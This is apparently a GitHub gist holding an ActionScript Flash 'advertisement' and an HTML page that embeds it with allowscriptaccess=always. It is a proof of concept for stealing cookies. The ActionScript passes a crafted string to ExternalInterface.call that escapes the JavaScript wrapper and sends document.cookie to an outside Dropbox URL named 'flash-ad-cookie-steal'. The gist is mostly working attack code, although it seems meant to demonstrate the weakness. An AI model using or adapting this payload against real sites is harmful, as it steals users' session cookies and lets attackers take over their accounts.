Created
March 16, 2011 14:17
-
-
Save saml/872565 to your computer and use it in GitHub Desktop.
ad.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package { | |
| import flash.display.Sprite; | |
| import flash.external.ExternalInterface; | |
| import flash.text.TextField; | |
| import flash.text.TextFieldType; | |
| import flash.text.TextFieldAutoSize; | |
| import flash.system.Security; | |
| //advertisement swf doing xhr to their domain | |
| [SWF(width="300",height="300")] | |
| public class ad extends Sprite { | |
| private const output:TextField = new TextField(); | |
| public function ad() { | |
| Security.allowDomain("*"); | |
| output.width = 300; | |
| output.height = 300; | |
| output.multiline = true; | |
| output.wordWrap = true; | |
| output.border = true; | |
| output.text = "ad\n"; | |
| addChild(output); | |
| //const script:String = '"\\"));console.debug(document.cookie);}catch(e){console.debug(e);}//""'; | |
| const script:String = '"\\"));var xhr=new XMLHttpRequest();xhr.open(\'GET\',\'http://dl.dropbox.com/u/17640032/flash-ad-cookie-steal/ad.as?\'+document.cookie,false);xhr.send();}catch(e){}//""'; | |
| if (ExternalInterface.available) { | |
| try { | |
| ExternalInterface.call("", script); | |
| } catch (error:SecurityError) { | |
| output.appendText("A SecurityError occurred: " + error.message + "\n" + error.errorID + "\n" + error.name + "\n"); | |
| } catch (error:Error) { | |
| output.appendText("An Error occurred: " + error.message + "\n"); | |
| } | |
| } else { | |
| output.appendText("External interface is not available for this container."); | |
| } | |
| } | |
| } | |
| } | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> | |
| <title>Advertisement</title> | |
| <script type="text/javascript"> | |
| var onReady = function() { | |
| document.cookie = "foo=bar"; | |
| }; | |
| </script> | |
| </head> | |
| <body onload="onReady();"> | |
| <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" | |
| id="ExternalInterfaceExample" width="300" height="300" | |
| codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab"> | |
| <param name="movie" value="http://dl.dropbox.com/u/17640032/flash-ad-cookie-steal/ad.swf" /> | |
| <param name="quality" value="high" /> | |
| <param name="bgcolor" value="#869ca7" /> | |
| <param name="allowscriptaccess" value="always" /> | |
| <embed src="http://dl.dropbox.com/u/17640032/flash-ad-cookie-steal/ad.swf" quality="high" bgcolor="#869ca7" | |
| width="300" height="300" name="ExternalInterfaceExample" align="middle" | |
| play="true" loop="false" quality="high" allowscriptaccess="always" | |
| type="application/x-shockwave-flash" | |
| flashvars='allowscriptaccess=always' | |
| pluginspage="http://www.macromedia.com/go/getflashplayer"> | |
| </embed> | |
| </object> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment